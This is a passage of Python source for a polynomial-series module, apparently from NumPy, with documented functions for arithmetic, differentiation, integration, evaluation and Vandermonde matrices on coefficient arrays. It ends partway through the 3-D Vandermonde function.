__all__ = ['polyzero', 'polyone', 'polyx', 'polydomain', 'polyline',
'polyadd', 'polysub', 'polymulx', 'polymul', 'polydiv', 'polypow',
'polyval', 'polyder', 'polyint', 'polyfromroots', 'polyvander',
'polyfit', 'polytrim', 'polyroots', 'Polynomial', 'polyval2d',
'polyval3d', 'polygrid2d', 'polygrid3d', 'polyvander2d', 'polyvander3d']
import numpy as np
import numpy.linalg as la
from . import polyutils as pu
import warnings
from .polytemplate import polytemplate
polytrim = pu.trimcoef
#
# These constant arrays are of integer type so as to be compatible
# with the widest range of other types, such as Decimal.
#
# Polynomial default domain.
polydomain = np.array([-1, 1])
# Polynomial coefficients representing zero.
polyzero = np.array([0])
# Polynomial coefficients representing one.
polyone = np.array([1])
# Polynomial coefficients representing the identity x.
polyx = np.array([0, 1])
#
# Polynomial series functions
#
def polyline(off, scl) :
"""
Returns an array representing a linear polynomial.
Parameters
----------
off, scl : scalars
The "y-intercept" and "slope" of the line, respectively.
Returns
-------
y : ndarray
This module's representation of the linear polynomial ``off +
scl*x``.
See Also
--------
chebline
Examples
--------
>>> from numpy import polynomial as P
>>> P.polyline(1,-1)
array([ 1, -1])
>>> P.polyval(1, P.polyline(1,-1)) # should be 0
0.0
"""
if scl != 0 :
return np.array([off, scl])
else :
return np.array([off])
def polyfromroots(roots) :
"""
Generate a monic polynomial with given roots.
Return the coefficients of the polynomial
.. math:: p(x) = (x - r_0) * (x - r_1) * ... * (x - r_n),
where the `r_n` are the roots specified in `roots`. If a zero has
multiplicity n, then it must appear in `roots` n times. For instance,
if 2 is a root of multiplicity three and 3 is a root of multiplicity 2,
then `roots` looks something like [2, 2, 2, 3, 3]. The roots can appear
in any order.
If the returned coefficients are `c`, then
.. math:: p(x) = c_0 + c_1 * x + ... + x^n
The coefficient of the last term is 1 for monic polynomials in this
form.
Parameters
----------
roots : array_like
Sequence containing the roots.
Returns
-------
out : ndarray
        1-D array of the polynomial's coefficients. If all the roots are
real, then `out` is also real, otherwise it is complex. (see
Examples below).
See Also
--------
chebfromroots, legfromroots, lagfromroots, hermfromroots
hermefromroots
Notes
-----
The coefficients are determined by multiplying together linear factors
of the form `(x - r_i)`, i.e.
.. math:: p(x) = (x - r_0) (x - r_1) ... (x - r_n)
where ``n == len(roots) - 1``; note that this implies that `1` is always
returned for :math:`a_n`.
Examples
--------
>>> import numpy.polynomial as P
>>> P.polyfromroots((-1,0,1)) # x(x - 1)(x + 1) = x^3 - x
array([ 0., -1., 0., 1.])
>>> j = complex(0,1)
>>> P.polyfromroots((-j,j)) # complex returned, though values are real
array([ 1.+0.j, 0.+0.j, 1.+0.j])
"""
if len(roots) == 0 :
return np.ones(1)
else :
[roots] = pu.as_series([roots], trim=False)
roots.sort()
p = [polyline(-r, 1) for r in roots]
n = len(p)
while n > 1:
m, r = divmod(n, 2)
tmp = [polymul(p[i], p[i+m]) for i in range(m)]
if r:
tmp[0] = polymul(tmp[0], p[-1])
p = tmp
n = m
return p[0]
def polyadd(c1, c2):
"""
Add one polynomial to another.
Returns the sum of two polynomials `c1` + `c2`. The arguments are
sequences of coefficients from lowest order term to highest, i.e.,
[1,2,3] represents the polynomial ``1 + 2*x + 3*x**2``.
Parameters
----------
c1, c2 : array_like
1-D arrays of polynomial coefficients ordered from low to high.
Returns
-------
out : ndarray
The coefficient array representing their sum.
See Also
--------
polysub, polymul, polydiv, polypow
Examples
--------
>>> from numpy import polynomial as P
>>> c1 = (1,2,3)
>>> c2 = (3,2,1)
>>> sum = P.polyadd(c1,c2); sum
array([ 4., 4., 4.])
>>> P.polyval(2, sum) # 4 + 4(2) + 4(2**2)
28.0
"""
# c1, c2 are trimmed copies
[c1, c2] = pu.as_series([c1, c2])
if len(c1) > len(c2) :
c1[:c2.size] += c2
ret = c1
else :
c2[:c1.size] += c1
ret = c2
return pu.trimseq(ret)
def polysub(c1, c2):
"""
Subtract one polynomial from another.
Returns the difference of two polynomials `c1` - `c2`. The arguments
are sequences of coefficients from lowest order term to highest, i.e.,
[1,2,3] represents the polynomial ``1 + 2*x + 3*x**2``.
Parameters
----------
c1, c2 : array_like
1-D arrays of polynomial coefficients ordered from low to
high.
Returns
-------
out : ndarray
Of coefficients representing their difference.
See Also
--------
polyadd, polymul, polydiv, polypow
Examples
--------
>>> from numpy import polynomial as P
>>> c1 = (1,2,3)
>>> c2 = (3,2,1)
>>> P.polysub(c1,c2)
array([-2., 0., 2.])
>>> P.polysub(c2,c1) # -P.polysub(c1,c2)
array([ 2., 0., -2.])
"""
# c1, c2 are trimmed copies
[c1, c2] = pu.as_series([c1, c2])
if len(c1) > len(c2) :
c1[:c2.size] -= c2
ret = c1
else :
c2 = -c2
c2[:c1.size] += c1
ret = c2
return pu.trimseq(ret)
def polymulx(c):
"""Multiply a polynomial by x.
Multiply the polynomial `c` by x, where x is the independent
variable.
Parameters
----------
c : array_like
1-D array of polynomial coefficients ordered from low to
high.
Returns
-------
out : ndarray
Array representing the result of the multiplication.
Notes
-----
.. versionadded:: 1.5.0
"""
# c is a trimmed copy
[c] = pu.as_series([c])
# The zero series needs special treatment
if len(c) == 1 and c[0] == 0:
return c
prd = np.empty(len(c) + 1, dtype=c.dtype)
prd[0] = c[0]*0
prd[1:] = c
return prd
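# Illustrative note (not part of the original docstring): multiplying by x
# shifts the coefficient array up one degree, e.g. polymulx([1, 2, 3]) gives
# array([ 0., 1., 2., 3.]), i.e. x + 2*x**2 + 3*x**3.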
def polymul(c1, c2):
"""
Multiply one polynomial by another.
Returns the product of two polynomials `c1` * `c2`. The arguments are
sequences of coefficients, from lowest order term to highest, e.g.,
[1,2,3] represents the polynomial ``1 + 2*x + 3*x**2.``
Parameters
----------
c1, c2 : array_like
1-D arrays of coefficients representing a polynomial, relative to the
"standard" basis, and ordered from lowest order term to highest.
Returns
-------
out : ndarray
Of the coefficients of their product.
See Also
--------
polyadd, polysub, polydiv, polypow
Examples
--------
>>> import numpy.polynomial as P
>>> c1 = (1,2,3)
>>> c2 = (3,2,1)
>>> P.polymul(c1,c2)
array([ 3., 8., 14., 8., 3.])
"""
# c1, c2 are trimmed copies
[c1, c2] = pu.as_series([c1, c2])
ret = np.convolve(c1, c2)
return pu.trimseq(ret)
def polydiv(c1, c2):
"""
Divide one polynomial by another.
Returns the quotient-with-remainder of two polynomials `c1` / `c2`.
The arguments are sequences of coefficients, from lowest order term
to highest, e.g., [1,2,3] represents ``1 + 2*x + 3*x**2``.
Parameters
----------
c1, c2 : array_like
1-D arrays of polynomial coefficients ordered from low to high.
Returns
-------
[quo, rem] : ndarrays
Of coefficient series representing the quotient and remainder.
See Also
--------
polyadd, polysub, polymul, polypow
Examples
--------
>>> import numpy.polynomial as P
>>> c1 = (1,2,3)
>>> c2 = (3,2,1)
>>> P.polydiv(c1,c2)
(array([ 3.]), array([-8., -4.]))
>>> P.polydiv(c2,c1)
(array([ 0.33333333]), array([ 2.66666667, 1.33333333]))
"""
# c1, c2 are trimmed copies
[c1, c2] = pu.as_series([c1, c2])
if c2[-1] == 0 :
raise ZeroDivisionError()
len1 = len(c1)
len2 = len(c2)
if len2 == 1 :
return c1/c2[-1], c1[:1]*0
elif len1 < len2 :
return c1[:1]*0, c1
else :
dlen = len1 - len2
scl = c2[-1]
c2 = c2[:-1]/scl
i = dlen
j = len1 - 1
while i >= 0 :
c1[i:j] -= c2*c1[j]
i -= 1
j -= 1
return c1[j+1:]/scl, pu.trimseq(c1[:j+1])
def polypow(c, pow, maxpower=None) :
"""Raise a polynomial to a power.
Returns the polynomial `c` raised to the power `pow`. The argument
`c` is a sequence of coefficients ordered from low to high. i.e.,
[1,2,3] is the series ``1 + 2*x + 3*x**2.``
Parameters
----------
c : array_like
        1-D array of series coefficients ordered from low to
high degree.
pow : integer
Power to which the series will be raised
maxpower : integer, optional
        Maximum power allowed. This is mainly to prevent the series from
        growing to an unmanageable size. Default is 16.
Returns
-------
coef : ndarray
Power series of power.
See Also
--------
polyadd, polysub, polymul, polydiv
Examples
--------
"""
# c is a trimmed copy
[c] = pu.as_series([c])
power = int(pow)
if power != pow or power < 0 :
raise ValueError("Power must be a non-negative integer.")
elif maxpower is not None and power > maxpower :
raise ValueError("Power is too large")
elif power == 0 :
return np.array([1], dtype=c.dtype)
elif power == 1 :
return c
else :
# This can be made more efficient by using powers of two
# in the usual way.
prd = c
for i in range(2, power + 1) :
prd = np.convolve(prd, c)
return prd
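# Illustrative note (the docstring's Examples section above is empty):
# raising to a power is repeated self-convolution, e.g. polypow([1, 2, 3], 2)
# returns array([  1.,   4.,  10.,  12.,   9.]), i.e. (1 + 2*x + 3*x**2)**2.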
def polyder(c, m=1, scl=1, axis=0):
"""
Differentiate a polynomial.
Returns the polynomial coefficients `c` differentiated `m` times along
`axis`. At each iteration the result is multiplied by `scl` (the
scaling factor is for use in a linear change of variable). The
argument `c` is an array of coefficients from low to high degree along
each axis, e.g., [1,2,3] represents the polynomial ``1 + 2*x + 3*x**2``
while [[1,2],[1,2]] represents ``1 + 1*x + 2*y + 2*x*y`` if axis=0 is
``x`` and axis=1 is ``y``.
Parameters
----------
c : array_like
Array of polynomial coefficients. If c is multidimensional the
different axis correspond to different variables with the degree
in each axis given by the corresponding index.
m : int, optional
Number of derivatives taken, must be non-negative. (Default: 1)
scl : scalar, optional
Each differentiation is multiplied by `scl`. The end result is
multiplication by ``scl**m``. This is for use in a linear change
of variable. (Default: 1)
axis : int, optional
Axis over which the derivative is taken. (Default: 0).
.. versionadded:: 1.7.0
Returns
-------
der : ndarray
Polynomial coefficients of the derivative.
See Also
--------
polyint
Examples
--------
>>> from numpy import polynomial as P
>>> c = (1,2,3,4) # 1 + 2x + 3x**2 + 4x**3
>>> P.polyder(c) # (d/dx)(c) = 2 + 6x + 12x**2
array([ 2., 6., 12.])
>>> P.polyder(c,3) # (d**3/dx**3)(c) = 24
array([ 24.])
>>> P.polyder(c,scl=-1) # (d/d(-x))(c) = -2 - 6x - 12x**2
array([ -2., -6., -12.])
>>> P.polyder(c,2,-1) # (d**2/d(-x)**2)(c) = 6 + 24x
array([ 6., 24.])
"""
c = np.array(c, ndmin=1, copy=1)
if c.dtype.char in '?bBhHiIlLqQpP':
# astype fails with NA
c = c + 0.0
cdt = c.dtype
cnt, iaxis = [int(t) for t in [m, axis]]
if cnt != m:
raise ValueError("The order of derivation must be integer")
if cnt < 0:
raise ValueError("The order of derivation must be non-negative")
if iaxis != axis:
raise ValueError("The axis must be integer")
if not -c.ndim <= iaxis < c.ndim:
raise ValueError("The axis is out of range")
if iaxis < 0:
iaxis += c.ndim
if cnt == 0:
return c
c = np.rollaxis(c, iaxis)
n = len(c)
if cnt >= n:
c = c[:1]*0
else :
for i in range(cnt):
n = n - 1
c *= scl
der = np.empty((n,) + c.shape[1:], dtype=cdt)
for j in range(n, 0, -1):
der[j - 1] = j*c[j]
c = der
c = np.rollaxis(c, 0, iaxis + 1)
return c
def polyint(c, m=1, k=[], lbnd=0, scl=1, axis=0):
"""
Integrate a polynomial.
Returns the polynomial coefficients `c` integrated `m` times from
`lbnd` along `axis`. At each iteration the resulting series is
**multiplied** by `scl` and an integration constant, `k`, is added.
The scaling factor is for use in a linear change of variable. ("Buyer
beware": note that, depending on what one is doing, one may want `scl`
to be the reciprocal of what one might expect; for more information,
see the Notes section below.) The argument `c` is an array of
coefficients, from low to high degree along each axis, e.g., [1,2,3]
represents the polynomial ``1 + 2*x + 3*x**2`` while [[1,2],[1,2]]
represents ``1 + 1*x + 2*y + 2*x*y`` if axis=0 is ``x`` and axis=1 is
``y``.
Parameters
----------
c : array_like
1-D array of polynomial coefficients, ordered from low to high.
m : int, optional
Order of integration, must be positive. (Default: 1)
k : {[], list, scalar}, optional
Integration constant(s). The value of the first integral at zero
is the first value in the list, the value of the second integral
at zero is the second value, etc. If ``k == []`` (the default),
all constants are set to zero. If ``m == 1``, a single scalar can
be given instead of a list.
lbnd : scalar, optional
The lower bound of the integral. (Default: 0)
scl : scalar, optional
Following each integration the result is *multiplied* by `scl`
before the integration constant is added. (Default: 1)
axis : int, optional
Axis over which the integral is taken. (Default: 0).
.. versionadded:: 1.7.0
Returns
-------
S : ndarray
Coefficient array of the integral.
Raises
------
ValueError
If ``m < 1``, ``len(k) > m``.
See Also
--------
polyder
Notes
-----
Note that the result of each integration is *multiplied* by `scl`. Why
is this important to note? Say one is making a linear change of
variable :math:`u = ax + b` in an integral relative to `x`. Then
    :math:`dx = du/a`, so one will need to set `scl` equal to
:math:`1/a` - perhaps not what one would have first thought.
Examples
--------
>>> from numpy import polynomial as P
>>> c = (1,2,3)
>>> P.polyint(c) # should return array([0, 1, 1, 1])
array([ 0., 1., 1., 1.])
>>> P.polyint(c,3) # should return array([0, 0, 0, 1/6, 1/12, 1/20])
array([ 0. , 0. , 0. , 0.16666667, 0.08333333,
0.05 ])
>>> P.polyint(c,k=3) # should return array([3, 1, 1, 1])
array([ 3., 1., 1., 1.])
>>> P.polyint(c,lbnd=-2) # should return array([6, 1, 1, 1])
array([ 6., 1., 1., 1.])
>>> P.polyint(c,scl=-2) # should return array([0, -2, -2, -2])
array([ 0., -2., -2., -2.])
"""
c = np.array(c, ndmin=1, copy=1)
if c.dtype.char in '?bBhHiIlLqQpP':
# astype doesn't preserve mask attribute.
c = c + 0.0
cdt = c.dtype
if not np.iterable(k):
k = [k]
cnt, iaxis = [int(t) for t in [m, axis]]
if cnt != m:
raise ValueError("The order of integration must be integer")
    if cnt < 0:
        raise ValueError("The order of integration must be non-negative")
    if len(k) > cnt:
        raise ValueError("Too many integration constants")
if iaxis != axis:
raise ValueError("The axis must be integer")
if not -c.ndim <= iaxis < c.ndim:
raise ValueError("The axis is out of range")
if iaxis < 0:
iaxis += c.ndim
if cnt == 0:
return c
k = list(k) + [0]*(cnt - len(k))
c = np.rollaxis(c, iaxis)
for i in range(cnt):
n = len(c)
c *= scl
if n == 1 and np.all(c[0] == 0):
c[0] += k[i]
else:
tmp = np.empty((n + 1,) + c.shape[1:], dtype=cdt)
tmp[0] = c[0]*0
tmp[1] = c[0]
for j in range(1, n):
tmp[j + 1] = c[j]/(j + 1)
tmp[0] += k[i] - polyval(lbnd, tmp)
c = tmp
c = np.rollaxis(c, 0, iaxis + 1)
return c
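# Illustrative sketch (an addition, not in the original module): polyint and
# polyder are inverse operations up to the integration constants, which gives
# a quick sanity check on the two definitions above:
#
#     >>> c = (1., 2., 3.)
#     >>> polyder(polyint(c))   # integrate once, then differentiate
#     array([ 1.,  2.,  3.])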
def polyval(x, c, tensor=True):
"""
Evaluate a polynomial at points x.
If `c` is of length `n + 1`, this function returns the value
.. math:: p(x) = c_0 + c_1 * x + ... + c_n * x^n
The parameter `x` is converted to an array only if it is a tuple or a
list, otherwise it is treated as a scalar. In either case, either `x`
or its elements must support multiplication and addition both with
themselves and with the elements of `c`.
If `c` is a 1-D array, then `p(x)` will have the same shape as `x`. If
`c` is multidimensional, then the shape of the result depends on the
value of `tensor`. If `tensor` is true the shape will be c.shape[1:] +
x.shape. If `tensor` is false the shape will be c.shape[1:]. Note that
    scalars have shape ().
Trailing zeros in the coefficients will be used in the evaluation, so
they should be avoided if efficiency is a concern.
Parameters
----------
x : array_like, compatible object
If `x` is a list or tuple, it is converted to an ndarray, otherwise
it is left unchanged and treated as a scalar. In either case, `x`
        or its elements must support addition and multiplication with
        themselves and with the elements of `c`.
c : array_like
Array of coefficients ordered so that the coefficients for terms of
degree n are contained in c[n]. If `c` is multidimensional the
remaining indices enumerate multiple polynomials. In the two
dimensional case the coefficients may be thought of as stored in
the columns of `c`.
tensor : boolean, optional
If True, the shape of the coefficient array is extended with ones
on the right, one for each dimension of `x`. Scalars have dimension 0
for this action. The result is that every column of coefficients in
`c` is evaluated for every element of `x`. If False, `x` is broadcast
over the columns of `c` for the evaluation. This keyword is useful
when `c` is multidimensional. The default value is True.
.. versionadded:: 1.7.0
Returns
-------
values : ndarray, compatible object
The shape of the returned array is described above.
See Also
--------
polyval2d, polygrid2d, polyval3d, polygrid3d
Notes
-----
The evaluation uses Horner's method.
Examples
--------
>>> from numpy.polynomial.polynomial import polyval
>>> polyval(1, [1,2,3])
6.0
>>> a = np.arange(4).reshape(2,2)
>>> a
array([[0, 1],
[2, 3]])
>>> polyval(a, [1,2,3])
array([[ 1., 6.],
[ 17., 34.]])
>>> coef = np.arange(4).reshape(2,2) # multidimensional coefficients
>>> coef
array([[0, 1],
[2, 3]])
>>> polyval([1,2], coef, tensor=True)
array([[ 2., 4.],
[ 4., 7.]])
>>> polyval([1,2], coef, tensor=False)
array([ 2., 7.])
"""
c = np.array(c, ndmin=1, copy=0)
if c.dtype.char in '?bBhHiIlLqQpP':
# astype fails with NA
c = c + 0.0
if isinstance(x, (tuple, list)):
x = np.asarray(x)
if isinstance(x, np.ndarray) and tensor:
c = c.reshape(c.shape + (1,)*x.ndim)
c0 = c[-1] + x*0
    for i in range(2, len(c) + 1):
c0 = c[-i] + c0*x
return c0
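# Illustrative sketch (an addition, not in the original module): the loop
# above is Horner's method, mentioned in the Notes section. Unrolled by hand
# for p(x) = 1 + 2x + 3x**2 at x = 2:
#
#     >>> acc = 3.0              # highest coefficient
#     >>> acc = acc*2.0 + 2.0    # 3*x + 2
#     >>> acc = acc*2.0 + 1.0    # (3*x + 2)*x + 1
#     >>> acc
#     17.0
#     >>> polyval(2.0, [1., 2., 3.])
#     17.0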
def polyval2d(x, y, c):
"""
Evaluate a 2-D polynomial at points (x, y).
This function returns the value
.. math:: p(x,y) = \\sum_{i,j} c_{i,j} * x^i * y^j
The parameters `x` and `y` are converted to arrays only if they are
tuples or a lists, otherwise they are treated as a scalars and they
must have the same shape after conversion. In either case, either `x`
and `y` or their elements must support multiplication and addition both
with themselves and with the elements of `c`.
If `c` has fewer than two dimensions, ones are implicitly appended to
its shape to make it 2-D. The shape of the result will be c.shape[2:] +
x.shape.
Parameters
----------
x, y : array_like, compatible objects
The two dimensional series is evaluated at the points `(x, y)`,
where `x` and `y` must have the same shape. If `x` or `y` is a list
or tuple, it is first converted to an ndarray, otherwise it is left
unchanged and, if it isn't an ndarray, it is treated as a scalar.
c : array_like
Array of coefficients ordered so that the coefficient of the term
of multi-degree i,j is contained in `c[i,j]`. If `c` has
dimension greater than two the remaining indices enumerate multiple
sets of coefficients.
Returns
-------
values : ndarray, compatible object
The values of the two dimensional polynomial at points formed with
pairs of corresponding values from `x` and `y`.
See Also
--------
polyval, polygrid2d, polyval3d, polygrid3d
Notes
-----
    .. versionadded:: 1.7.0
"""
try:
x, y = np.array((x, y), copy=0)
    except Exception:
raise ValueError('x, y are incompatible')
c = polyval(x, c)
c = polyval(y, c, tensor=False)
return c
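# Illustrative sketch (an addition, not in the original module): in the 2-D
# case the coefficient c[i, j] multiplies x**i * y**j, so c = [[1, 2], [3, 4]]
# encodes 1 + 2*y + 3*x + 4*x*y. At (x, y) = (1, 2) that is 1 + 4 + 3 + 8:
#
#     >>> polyval2d(1., 2., [[1., 2.], [3., 4.]])
#     16.0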
def polygrid2d(x, y, c):
"""
Evaluate a 2-D polynomial on the Cartesian product of x and y.
This function returns the values:
.. math:: p(a,b) = \\sum_{i,j} c_{i,j} * a^i * b^j
where the points `(a, b)` consist of all pairs formed by taking
`a` from `x` and `b` from `y`. The resulting points form a grid with
`x` in the first dimension and `y` in the second.
The parameters `x` and `y` are converted to arrays only if they are
tuples or a lists, otherwise they are treated as a scalars. In either
case, either `x` and `y` or their elements must support multiplication
and addition both with themselves and with the elements of `c`.
If `c` has fewer than two dimensions, ones are implicitly appended to
its shape to make it 2-D. The shape of the result will be c.shape[2:] +
x.shape + y.shape.
Parameters
----------
x, y : array_like, compatible objects
The two dimensional series is evaluated at the points in the
Cartesian product of `x` and `y`. If `x` or `y` is a list or
tuple, it is first converted to an ndarray, otherwise it is left
unchanged and, if it isn't an ndarray, it is treated as a scalar.
c : array_like
Array of coefficients ordered so that the coefficients for terms of
degree i,j are contained in ``c[i,j]``. If `c` has dimension
greater than two the remaining indices enumerate multiple sets of
coefficients.
Returns
-------
values : ndarray, compatible object
The values of the two dimensional polynomial at points in the Cartesian
product of `x` and `y`.
See Also
--------
polyval, polyval2d, polyval3d, polygrid3d
Notes
-----
    .. versionadded:: 1.7.0
"""
c = polyval(x, c)
c = polyval(y, c)
return c
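# Illustrative sketch (an addition, not in the original module): unlike
# polyval2d, polygrid2d evaluates on the full Cartesian product, so the
# result has shape x.shape + y.shape:
#
#     >>> polygrid2d([0., 1., 2.], [0., 1.], [[1., 2.], [3., 4.]]).shape
#     (3, 2)
#     >>> polygrid2d(2., 1., [[1., 2.], [3., 4.]])   # 1 + 2*1 + 3*2 + 4*2*1
#     17.0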
def polyval3d(x, y, z, c):
"""
Evaluate a 3-D polynomial at points (x, y, z).
This function returns the values:
.. math:: p(x,y,z) = \\sum_{i,j,k} c_{i,j,k} * x^i * y^j * z^k
The parameters `x`, `y`, and `z` are converted to arrays only if
they are tuples or a lists, otherwise they are treated as a scalars and
they must have the same shape after conversion. In either case, either
`x`, `y`, and `z` or their elements must support multiplication and
addition both with themselves and with the elements of `c`.
If `c` has fewer than 3 dimensions, ones are implicitly appended to its
shape to make it 3-D. The shape of the result will be c.shape[3:] +
x.shape.
Parameters
----------
x, y, z : array_like, compatible object
The three dimensional series is evaluated at the points
`(x, y, z)`, where `x`, `y`, and `z` must have the same shape. If
any of `x`, `y`, or `z` is a list or tuple, it is first converted
to an ndarray, otherwise it is left unchanged and if it isn't an
ndarray it is treated as a scalar.
c : array_like
Array of coefficients ordered so that the coefficient of the term of
multi-degree i,j,k is contained in ``c[i,j,k]``. If `c` has dimension
greater than 3 the remaining indices enumerate multiple sets of
coefficients.
Returns
-------
values : ndarray, compatible object
The values of the multidimensional polynomial on points formed with
triples of corresponding values from `x`, `y`, and `z`.
See Also
--------
polyval, polyval2d, polygrid2d, polygrid3d
Notes
-----
    .. versionadded:: 1.7.0
"""
try:
x, y, z = np.array((x, y, z), copy=0)
    except Exception:
raise ValueError('x, y, z are incompatible')
c = polyval(x, c)
c = polyval(y, c, tensor=False)
c = polyval(z, c, tensor=False)
return c
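# Illustrative sketch (an addition, not in the original module): with all
# coefficients equal to one, evaluating at (1, 1, 1) just counts the 2*2*2
# terms of the polynomial:
#
#     >>> polyval3d(1., 1., 1., np.ones((2, 2, 2)))
#     8.0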
def polygrid3d(x, y, z, c):
"""
Evaluate a 3-D polynomial on the Cartesian product of x, y and z.
This function returns the values:
.. math:: p(a,b,c) = \\sum_{i,j,k} c_{i,j,k} * a^i * b^j * c^k
where the points `(a, b, c)` consist of all triples formed by taking
`a` from `x`, `b` from `y`, and `c` from `z`. The resulting points form
a grid with `x` in the first dimension, `y` in the second, and `z` in
the third.
The parameters `x`, `y`, and `z` are converted to arrays only if they
are tuples or a lists, otherwise they are treated as a scalars. In
either case, either `x`, `y`, and `z` or their elements must support
multiplication and addition both with themselves and with the elements
of `c`.
If `c` has fewer than three dimensions, ones are implicitly appended to
its shape to make it 3-D. The shape of the result will be c.shape[3:] +
x.shape + y.shape + z.shape.
Parameters
----------
x, y, z : array_like, compatible objects
The three dimensional series is evaluated at the points in the
Cartesian product of `x`, `y`, and `z`. If `x`,`y`, or `z` is a
list or tuple, it is first converted to an ndarray, otherwise it is
left unchanged and, if it isn't an ndarray, it is treated as a
scalar.
c : array_like
        Array of coefficients ordered so that the coefficient of the term of
        multi-degree i,j,k is contained in ``c[i,j,k]``. If `c` has dimension
        greater than three the remaining indices enumerate multiple sets of
        coefficients.
Returns
-------
    values : ndarray, compatible object
        The values of the three dimensional polynomial at points in the
        Cartesian product of `x`, `y`, and `z`.
See Also
--------
polyval, polyval2d, polygrid2d, polyval3d
Notes
-----
    .. versionadded:: 1.7.0
"""
c = polyval(x, c)
c = polyval(y, c)
c = polyval(z, c)
return c
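# Illustrative sketch (an addition, not in the original module): the grid
# variant returns one value per point of the Cartesian product, giving the
# x.shape + y.shape + z.shape result described above:
#
#     >>> polygrid3d(np.ones(3), np.ones(4), np.ones(5), np.ones((2, 2, 2))).shape
#     (3, 4, 5)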
def polyvander(x, deg):
"""Vandermonde matrix of given degree.
Returns the Vandermonde matrix of degree `deg` and sample points
`x`. The Vandermonde matrix is defined by
.. math:: V[..., i] = x^i,
where `0 <= i <= deg`. The leading indices of `V` index the elements of
`x` and the last index is the power of `x`.
If `c` is a 1-D array of coefficients of length `n + 1` and `V` is the
matrix ``V = polyvander(x, n)``, then ``np.dot(V, c)`` and
``polyval(x, c)`` are the same up to roundoff. This equivalence is
useful both for least squares fitting and for the evaluation of a large
number of polynomials of the same degree and sample points.
Parameters
----------
x : array_like
Array of points. The dtype is converted to float64 or complex128
depending on whether any of the elements are complex. If `x` is
scalar it is converted to a 1-D array.
deg : int
Degree of the resulting matrix.
Returns
-------
    vander : ndarray
The Vandermonde matrix. The shape of the returned matrix is
``x.shape + (deg + 1,)``, where the last index is the power of `x`.
The dtype will be the same as the converted `x`.
See Also
--------
polyvander2d, polyvander3d
"""
ideg = int(deg)
if ideg != deg:
raise ValueError("deg must be integer")
if ideg < 0:
raise ValueError("deg must be non-negative")
x = np.array(x, copy=0, ndmin=1) + 0.0
dims = (ideg + 1,) + x.shape
dtyp = x.dtype
v = np.empty(dims, dtype=dtyp)
v[0] = x*0 + 1
    if ideg > 0:
        v[1] = x
        for i in range(2, ideg + 1):
v[i] = v[i-1]*x
return np.rollaxis(v, 0, v.ndim)
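# Illustrative sketch (an addition, not in the original module): the
# docstring claims that ``np.dot(V, c)`` matches ``polyval(x, c)``; a quick
# check with a small Vandermonde matrix:
#
#     >>> x = np.array([0., 1., 2.])
#     >>> V = polyvander(x, 2)          # columns are x**0, x**1, x**2
#     >>> c = np.array([1., 2., 3.])
#     >>> np.allclose(np.dot(V, c), polyval(x, c))
#     True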
def polyvander2d(x, y, deg):
"""Pseudo-Vandermonde matrix of given degrees.
Returns the pseudo-Vandermonde matrix of degrees `deg` and sample
points `(x, y)`. The pseudo-Vandermonde matrix is defined by
.. math:: V[..., deg[1]*i + j] = x^i * y^j,
where `0 <= i <= deg[0]` and `0 <= j <= deg[1]`. The leading indices of
`V` index the points `(x, y)` and the last index encodes the powers of
`x` and `y`.
If ``V = polyvander2d(x, y, [xdeg, ydeg])``, then the columns of `V`
correspond to the elements of a 2-D coefficient array `c` of shape
(xdeg + 1, ydeg + 1) in the order
.. math:: c_{00}, c_{01}, c_{02} ... , c_{10}, c_{11}, c_{12} ...
and ``np.dot(V, c.flat)`` and ``polyval2d(x, y, c)`` will be the same
up to roundoff. This equivalence is useful both for least squares
fitting and for the evaluation of a large number of 2-D polynomials
of the same degrees and sample points.
Parameters
----------
x, y : array_like
Arrays of point coordinates, all of the same shape. The dtypes
will be converted to either float64 or complex128 depending on
whether any of the elements are complex. Scalars are converted to
1-D arrays.
deg : list of ints
List of maximum degrees of the form [x_deg, y_deg].
Returns
-------
vander2d : ndarray
The shape of the returned matrix is ``x.shape + (order,)``, where
        :math:`order = (deg[0]+1)*(deg[1]+1)`. The dtype will be the same
as the converted `x` and `y`.
See Also
--------
    polyvander, polyvander3d, polyval2d, polyval3d
"""
ideg = [int(d) for d in deg]
is_valid = [id == d and id >= 0 for id, d in zip(ideg, deg)]
if is_valid != [1, 1]:
raise ValueError("degrees must be non-negative integers")
degx, degy = ideg
x, y = np.array((x, y), copy=0) + 0.0
vx = polyvander(x, degx)
vy = polyvander(y, degy)
v = vx[..., None]*vy[..., None,:]
# einsum bug
#v = np.einsum("...i,...j->...ij", vx, vy)
return v.reshape(v.shape[:-2] + (-1,))
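# Illustrative sketch (an addition, not in the original module): the
# flattened coefficient ordering documented above means ``np.dot(V, c.flat)``
# agrees with polyval2d:
#
#     >>> x = y = np.array([0., 1.])
#     >>> V = polyvander2d(x, y, [1, 1])
#     >>> V.shape                        # x.shape + ((1+1)*(1+1),)
#     (2, 4)
#     >>> c = np.array([[1., 2.], [3., 4.]])
#     >>> np.allclose(np.dot(V, c.flat), polyval2d(x, y, c))
#     True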
def polyvander3d(x, y, z, deg):
"""Pseudo-Vandermonde matrix of given degrees.
Returns the pseudo-Vandermonde matrix of degrees `deg` and sample
points `(x, y, z)`. If `l, m, n` are the given degrees in `x, y, z`,
    then the pseudo-Vandermonde matrix is defined by
.. math:: V[..., (m+1)(n+1)i + (n+1)j + k] = x^i * y^j * z^k,
    where `0 <= i <= l`, `0 <= j <= m`, and `0 <= k <= n`. The leading
indices of `V` index the points `(x, y, z)` and the last index encodes
the powers of `x`, `y`, and `z`.
If ``V = polyvander3d(x, y, z, [xdeg, ydeg, zdeg])``, then the columns
of `V` correspond to the elements of a 3-D coefficient array `c` of
shape (xdeg + 1, ydeg + 1, zdeg + 1) in the order
.. math:: c_{000}, c_{001}, c_{002},... , c_{010}, c_{011}, c_{012},...
and ``np.dot(V, c.flat)`` and ``polyval3d(x, y, z, c)`` will be the
same up to roundoff. This equivalence is useful both for least squares
fitting and for the evaluation of a large number of 3-D polynomials
of the same degrees and sample points.
Parameters
----------
x, y, z : array_like
Arrays of point coordinates, all of the same shape. The dtypes will
be converted to either float64 or complex128 depending on whether
any of the elements are complex. Scalars are converted to 1-D
arrays.
deg : list of ints
List of maximum degrees of the form [x_deg, y_deg, z_deg].
Returns
-------
vander3d : ndarray
The shape of the returned matrix is ``x.shape + (order,)``, where
        :math:`order = (deg[0]+1)*(deg[1]+1)*(deg[2]+1)`. The dtype will
be the same as the converted `x`, `y`, and `z`.
See Also
--------
    polyvander, polyvander2d, polyval2d, polyval3d
Notes
-----
    .. versionadded:: 1.7.0
"""
ideg = [int(d) for d in deg]
is_valid = [id == d and id >= 0 for id, d in zip(ideg, deg)]
if is_valid != [1, 1, 1]:
raise ValueError("degrees must be non-negative integers")
degx, degy, degz = ideg
